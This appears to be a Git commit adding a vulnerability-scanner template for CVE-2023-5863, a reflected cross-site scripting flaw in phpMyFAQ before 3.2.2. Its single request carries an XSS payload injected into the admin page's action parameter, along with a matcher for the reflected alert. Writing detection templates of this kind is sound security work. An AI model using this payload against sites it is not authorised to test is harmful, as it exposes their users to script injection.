Create CVE-2023-5863.yaml
parent
1233e71e5a
commit
f3face915b
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2023-5863
|
||||
|
||||
info:
|
||||
name: phpMyFAQ < 3.2.0 - Cross-site Scripting (XSS) - Reflected
|
||||
author: ctflearner
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.
|
||||
reference:
|
||||
- https://huntr.com/bounties/fbfd4e84-61fb-4063-8f11-15877b8c1f6f
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-5863
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-5863
|
||||
cwe-id: CWE-79
|
||||
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
product: phpMyFAQ
|
||||
tags: cve2023,cve,huntr,phpMyFAQ,reflectedxss,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/index.php?action=ngductung"><img src/onerror="alert('XSS')"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "alert('XSS')"
|
Loading…
Reference in New Issue